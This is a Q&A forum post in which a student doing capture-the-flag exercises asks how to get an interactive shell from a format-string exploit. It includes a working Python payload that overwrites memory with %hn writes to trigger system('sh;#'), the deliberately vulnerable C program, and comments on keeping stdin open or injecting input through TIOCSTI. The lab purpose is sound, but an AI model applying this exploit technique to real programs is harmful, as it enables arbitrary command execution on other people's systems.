0

I'm studying computer science and doing security exercises at https://ctf101.org/ and exploit exercises in my free time.

I want to send input to a program's STDIN (i.e. the payload below) in a format-string exploit exercise, where the program is reading from fgets() twice.

Now, if I pipe the payload (see below), then system("sh;#") is executed, but it exits immediately, since the pipe sends EOF?

I've also checked the program's tty, and then writing to /dev/pts/0, but that doesn't work. Neither does it work to write to /proc/PID/fd/0.

How can I write to the program's STDIN, so that the call system("sh;#") will result in an interactive shell (not terminating immediately)?

python -c 'print("sh;#"+"%54012x"+"%12$hn"+"%09441x"+"%13$hn"+"##"+"\x50\x33\x40\x00\x00\x00\x00\x00"+"\x52\x33\x40\x00\x00\x00\x00\x00")' | env -i ./fmtstr0x1

The complete program:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define BUFSZ 128

int main(int argc, char** argv) {
    char buffer[BUFSZ];
    fgets(buffer, BUFSZ, stdin);
    printf(buffer);
    fgets(buffer, BUFSZ, stdin); // exploit this!
    return 0;
}
ctrl-alt-delor
  • 27,993
Shuzheng
  • 4,411
  • I haven't tried your exploit, but you certainly can keep your pipe open with { python -c '...'; cat; } | ./exploitable_program. –  Mar 24 '19 at 18:33
  • 1
    Nobody is sending any EOF through a pipe, ever. –  Mar 24 '19 at 19:00
  • If you want your shell to run with prompt and all interactive features, you can inject the payload with ioctl(TIOCSTI) instead of redirecting its input from a pipe -- example with tiocsti demo from here: printf 'exploit' | ./tiocsti & env -i ./fmtstr0x1. –  Mar 24 '19 at 19:12
  • Can you explain what (not just how) you are trying to do? – ctrl-alt-delor Mar 24 '19 at 19:14
  • @mosvy - why don't you call an EOF an event? – Shuzheng Mar 24 '19 at 21:27
  • @Shuzheng please read my answer to the 1st answer from the search link -- a read(2) on the reading end of a pipe will return 0 (EOF) when all handles to its writing end are closed. So all you have to do is to keep a handle to the writing end open, and keep feeding data to the shell through it. –  Mar 24 '19 at 21:31
  • @mosvy - what is your definition on an "event" in your answer (a signal?)? Isn't it an event that read() returns 0? Do you know how to keep a write handle open using terminal commands :-) ? – Shuzheng Mar 24 '19 at 22:00

0 Answers0